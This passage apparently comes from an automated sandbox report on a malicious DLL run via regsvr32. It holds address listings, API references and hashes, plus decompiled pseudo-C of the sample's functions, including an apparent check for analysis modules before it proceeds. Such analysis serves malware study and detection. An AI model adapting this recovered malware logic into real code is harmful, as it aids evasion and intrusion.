        0x1001302c
        0x10012fef
        0x10013032
        0x10013032
        0x10013035
        0x10013037
        0x1001303a
        0x1001303c
        0x1001303f
        0x10013042
        0x10013044
        0x10013047
        0x1001304f
        0x10013057
        0x1001305a
        0x1001305a
        0x1001305a
        0x1001305d
        0x1001305d
        0x1001305d
        0x10013060
        0x10013066
        0x10013068
        0x10013068
        0x1001306e
        0x10013074
        0x1001307d
        0x10013084
        0x10013086
        0x10013089
        0x10013089
        0x1001308c
        0x1001308c
        0x1001308f
        0x10013091
        0x10013094
        0x10013096
        0x100130b1
        0x100130b1
        0x100130b5
        0x100130b8
        0x100130bb
        0x100130be
        0x100130d4
        0x100130d4
        0x100130d4
        0x100130c0
        0x100130c0
        0x100130c2
        0x100130c6
        0x100130c9
        0x00000000
        0x100130cb
        0x100130cb
        0x100130cd
        0x00000000
        0x100130cf
        0x100130cf
        0x100130cf
        0x100130cd
        0x100130c9
        0x100130d8
        0x100130db
        0x100130e0
        0x100130ea
        0x100130ea
        0x100130ea
        0x100130ed
        0x10013098
        0x10013098
        0x1001309a
        0x100130a1
        0x100130a1
        0x100130a3
        0x100130a5
        0x100130a7
        0x100130ab
        0x100130ad
        0x100130af
        0x00000000
        0x00000000
        0x100130af
        0x100130ab
        0x1001309c
        0x1001309c
        0x1001309f
        0x00000000
        0x00000000
        0x1001309f
        0x1001309a
        0x100130f7
        0x100130f9
        0x100130f9
        0x10013104
        0x10012fa7
        0x10012fa7
        0x10012faa
        0x00000000
        0x10012fac
        0x10012fac
        0x10012fae
        0x10012fb2
        0x00000000
        0x10012fb4
        0x10012fb4
        0x10012fb4
        0x10012fb7
        0x00000000
        0x10012fbb
        0x10012fc4
        0x10012fc4
        0x10012fb7
        0x10012fb2
        0x10012faa
        0x10012f96
        0x10012f9f
        0x10012f9f

        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
        Download Yara Rule
        C-Code - Quality: 70%
        			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x2120590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x2120590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x2120590
						_t22 = _t133 + 0x114; // 0x21206a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x2120590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x219fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x219fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x2120590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x219faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x2120590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x2120590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x2120590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x2120590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x219faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x2120590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x2120590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x219faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x2120590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x2120590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x2120590
								_t117 = _t331 + 0x228; // 0x21207b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































        0x10004d6d
        0x10004d73
        0x10004d79
        0x10004d7e
        0x10004d8c
        0x10004d8f
        0x10004dee
        0x10004e00
        0x10004e03
        0x10004e0a
        0x10004e0f
        0x10004e14
        0x10004e1b
        0x10004e25
        0x10004e2c
        0x10004e37
        0x10004e3c
        0x10004e43
        0x10004e49
        0x10004e4b
        0x10004e4c
        0x10004e50
        0x10004e5b
        0x10004e60
        0x10004e69
        0x10004e6e
        0x10004e76
        0x10004e7d
        0x10004e7e
        0x10004e80
        0x10004e9c
        0x10004e9f
        0x10004e9f
        0x10004ea8
        0x10004ead
        0x10004ebd
        0x10004ec5
        0x10004eca
        0x10004ed0
        0x10004ed3
        0x10004ed9
        0x10004ef8
        0x10004efe
        0x10004eff
        0x10004f00
        0x10004f01
        0x10004f02
        0x10004f03
        0x10004f0d
        0x10004f11
        0x10004f16
        0x10004f19
        0x10004f1b
        0x10004f2d
        0x10004f2d
        0x10004f2f
        0x10004f3b
        0x10004f40
        0x10004f46
        0x10004f4f
        0x10004f52
        0x10004f54
        0x10004f5f
        0x10004f64
        0x10004f69
        0x10004f6e
        0x10004f6e
        0x10004f71
        0x10004f78
        0x00000000
        0x10004f7e
        0x10004f7e
        0x10004f83
        0x10004f87
        0x10004f89
        0x10004f8c
        0x10004f8e
        0x10004f94
        0x10004f94
        0x10004f8e
        0x10004f96
        0x10004f9b
        0x10004fa1
        0x10004fa3
        0x00000000
        0x10004fa9
        0x10004fa9
        0x10004fad
        0x10005082
        0x10005088
        0x1000508e
        0x10005099
        0x1000509a
        0x1000509b
        0x1000509c
        0x100050a2
        0x100050a7
        0x100050ad
        0x100050b5
        0x100050bb
        0x100050be
        0x100050cd
        0x100050d4
        0x100050d7
        0x100050e4
        0x100050e8
        0x100050f5
        0x100050fa
        0x100050fd
        0x100050ff
        0x10005110
        0x10005112
        0x10005116
        0x10005117
        0x10005119
        0x10005124
        0x10005129
        0x10005136
        0x1000513a
        0x1000513b
        0x1000513d
        0x10005145
        0x10005146
        0x1000514b
        0x10005163
        0x10005168
        0x1000516b
        0x1000516f
        0x10005171
        0x10005184
        0x1000518e
        0x10005192
        0x1000519a
        0x1000519b
        0x100051a3
        0x100051a4
        0x100051a9
        0x100051b5
        0x100051bf
        0x100051d1
        0x100051dd
        0x100051e2
        0x100051e2
        0x100051ec
        0x100051f2
        0x100051f2
        0x10005119
        0x100050ff
        0x00000000
        0x10005088
        0x10004fb3
        0x10004fb6
        0x00000000
        0x00000000
        0x10004fbc
        0x10004fc7
        0x10004fc8
        0x10004fc9
        0x10004fca
        0x10004fd0
        0x10004fd5
        0x10004fe9
        0x10004fee
        0x10004ff2
        0x10004ffd
        0x10005006
        0x10005008
        0x1000500c
        0x1000500d
        0x1000500f
        0x1000501a
        0x10005020
        0x10005032
        0x10005035
        0x10005038
        0x10005045
        0x1000504d
        0x10005057
        0x10005069
        0x10005075
        0x1000507a
        0x00000000
        0x1000500f
        0x10004fa3
        0x10004edb
        0x10004edb
        0x10004ee1
        0x10004ee3
        0x00000000
        0x00000000
        0x10004ee5
        0x10004ee9
        0x100051f3
        0x100051f8
        0x100051fe
        0x10005200
        0x10005201
        0x10005205
        0x10005215
        0x1000521a
        0x1000521e
        0x10005220
        0x10005224
        0x10005229
        0x1000522b
        0x1000522d
        0x10005233
        0x10005233
        0x10005240
        0x10005246
        0x1000524c
        0x10005251
        0x1000526f
        0x10005271
        0x1000527d
        0x1000527d
        0x10005283
        0x10005285
        0x1000528b
        0x1000529d
        0x100052a3
        0x100052af
        0x100052b7
        0x100052b7
        0x100052b7
        0x100052b9
        0x100052bf
        0x100052bf
        0x10004eef
        0x10004ef2
        0x00000000
        0x00000000
        0x00000000
        0x10004ef2
        0x10004ed9
        0x10004e1d
        0x10004e1d
        0x00000000
        0x10004e1d
        0x10004d9b
        0x10004da2
        0x10004dab
        0x10004dad
        0x10004db3
        0x10004dc4
        0x10004dcd
        0x10004dcd
        0x10004dd9
        0x10004de2
        0x10004de7
        0x10004dec
        0x00000000
        0x00000000
        0x10004dec

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
        • lstrcpynW.KERNEL32(02120158,00000105), ref: 1000526F
        • lstrcpynW.KERNEL32(02120368,00000105), ref: 10005283
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
        • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
        • Opcode Fuzzy Hash: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
        • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
        Download Yara Rule
        C-Code - Quality: 75%
        			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x219faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x219faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























        0x10001c68
        0x10001c75
        0x10001c77
        0x10001c7e
        0x10001ce4
        0x10001c8b
        0x10001c90
        0x10001c96
        0x10001c9b
        0x10001ca1
        0x10001ca3
        0x10001ca7
        0x10001d15
        0x10001d17
        0x10001d99
        0x10001d9f
        0x10001d9f
        0x10001ca9
        0x10001cb1
        0x10001cb1
        0x10001cbd
        0x10001cc3
        0x10001cc5
        0x00000000
        0x00000000
        0x10001cc7
        0x10001cd1
        0x10001cd7
        0x10001cdd
        0x10001cdf
        0x00000000
        0x10001cdf
        0x10001cab
        0x10001caf
        0x00000000
        0x00000000
        0x00000000
        0x10001caf
        0x10001cee
        0x10001cef
        0x10001cf0
        0x10001cf1
        0x10001cf2
        0x10001cf7
        0x10001d01
        0x10001d06
        0x10001d0e
        0x10001d29
        0x10001d2c
        0x10001d36
        0x10001d41
        0x10001d54
        0x10001d56
        0x10001d58
        0x10001d5a
        0x10001d5b
        0x10001d63
        0x10001d64
        0x10001d6a
        0x10001d10
        0x10001d10
        0x10001d10
        0x10001d6b
        0x10001d76
        0x10001d79
        0x10001d7f
        0x10001d85
        0x10001d90
        0x10001d97
        0x00000000

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
        • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
        • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
        • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x219faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x219faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























        0x10001b2d
        0x10001b33
        0x10001b41
        0x10001baf
        0x10001b4e
        0x10001b53
        0x10001b59
        0x10001b5e
        0x10001b64
        0x10001b66
        0x10001b6a
        0x10001c64
        0x10001c64
        0x10001b70
        0x10001b70
        0x10001b7c
        0x10001b7c
        0x10001b88
        0x10001b8e
        0x10001b90
        0x00000000
        0x10001b92
        0x10001b92
        0x10001b9c
        0x10001ba2
        0x10001ba8
        0x10001baa
        0x00000000
        0x10001baa
        0x10001b72
        0x10001b72
        0x10001b76
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x10001b76
        0x10001b70
        0x10001c5d
        0x10001c63
        0x10001c63
        0x10001bb8
        0x10001bcc
        0x10001bcf
        0x10001bd9
        0x10001be5
        0x10001bef
        0x10001bf0
        0x10001bf1
        0x10001bf2
        0x10001bf7
        0x10001c00
        0x10001c04
        0x10001c06
        0x10001c07
        0x10001c0f
        0x10001c10
        0x10001c16
        0x10001c1b
        0x10001c21
        0x10001c21
        0x10001c26
        0x10001c31
        0x10001c34
        0x10001c3c
        0x10001c48
        0x10001c4b
        0x10001c51
        0x10001c56
        0x10001c5b
        0x00000000

        APIs
        • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
        • DuplicateHandle.KERNEL32 ref: 10001BD9
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
        • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
        • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
        • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
        Download Yara Rule
        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516656148.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

